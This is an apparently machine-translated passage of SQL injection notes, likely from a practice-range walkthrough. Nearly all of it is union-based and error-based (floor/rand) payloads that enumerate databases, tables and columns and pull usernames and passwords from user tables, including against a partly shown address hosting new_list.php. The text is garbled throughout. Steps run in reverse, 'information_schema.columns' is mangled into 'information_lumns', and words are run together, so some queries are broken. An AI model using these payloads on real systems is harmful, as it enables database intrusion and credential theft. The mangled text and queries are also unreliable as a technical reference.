Select * from table where id = $id + (followed by possible restriction statements or nested query statements, etc.,So I have a habit of following the injection statement with a comment character to block these possible interferences)
Page in the previous section we have already observed,This time we will start thinking directly,and still guessingsqlfor: (table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20-%20-Įxplode the name of the table to performhashcode ?id=0‘ union select 1,2,group_concat(username,0x3a,password) from users-+(Explode the field name of the target column) (Explode the column name of the target table) ?id = 0 " union select 1,2,group_concat(column_name) from information_lumns where table_name= "users " -+ ?id =- 1’ union select 1, 2,group_concat(table_name) from information_schema.tables where table_schema = database() -(Explode all tables of the current database) ?id =- 1’ union select 1, 2, database() -(The current database name is displayed back on the page) ?id = 1’ order by n -(orderTest field length,An error means that the maximum length is exceeded) ?id = 1’ -(Commenting out the extra’limit 0,1 The page is normal) ?id = 1 ’(Test for the presence of injection,The error is reported in the)
Take the book search page as an example,postAname =1to the back end,splice tosqlstatementselect * from books where bookid =‘$id’limit 0, 1 ?id=2 " and ( select 1 from ( select count( *),concat((( select concat(password, " ") from users limit 0, 1)), floor ( rand( 0) * 2))x from information_schema.tables group by x)a). ?id = 2 " and (select 1 from (select count(*),concat(((select concat(column_name, " " ) from information_lumns where table_name= "users " limit 5,1)),floor (rand(0)*2))x from information_schema.tables group by x)a). ?id=2 " and ( select 1 from ( select count( *),concat((( select concat(table_name, " ") from information_schema.tables where table_schema = " security " limit 0, 1)), floor ( rand( 0) * 2))x from information_schema.tables group by x)a). ?id = 2 " and (select 1 from (select count(*),concat(((select concat(database(), " " ))),floor (rand(0)*2))x from information_schema.tables group by x)a). " and ( select 1 from ( select count( *),concat((( select concat(schema_name, " ") from information_schema.schemata limit 0, 1)), floor ( rand( 0) * 2))x from information_schema.tables group by x)a). ?id = 1 " and (select 1 from (select count(*),concat(((select (schema_name) from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a). 49.228: 48120 /new_list.php?id =- 1 union select 1,group_concat(name, 0x3a,password), 3, 4 from StormGroup_member -(injects out the field value) 49.228: 48120 /new_list.php?id =- 1 union select 1,group_concat(column_name), 3, 4 from information_lumns where table_name ="StormGroup_member" -(Inject the column name)
49.228: 48120 /new_list.php?id =- 1 union select 1,group_concat(table_name), 3, 4 from information_schema.tables where table_schema = database() - (injects out the table names) LetidThe query does not shows that ourunion selectthe value of andunion select The number after that follows theorder by The value of the judgment
49.228: 48120 /new_list.php?id = 1 " order by 4- Determine the number of fields If it isid=1 " and 1 = 1 - thenand 1=1 is the point we can control The next substitution in this position is good
0 kommentar(er)
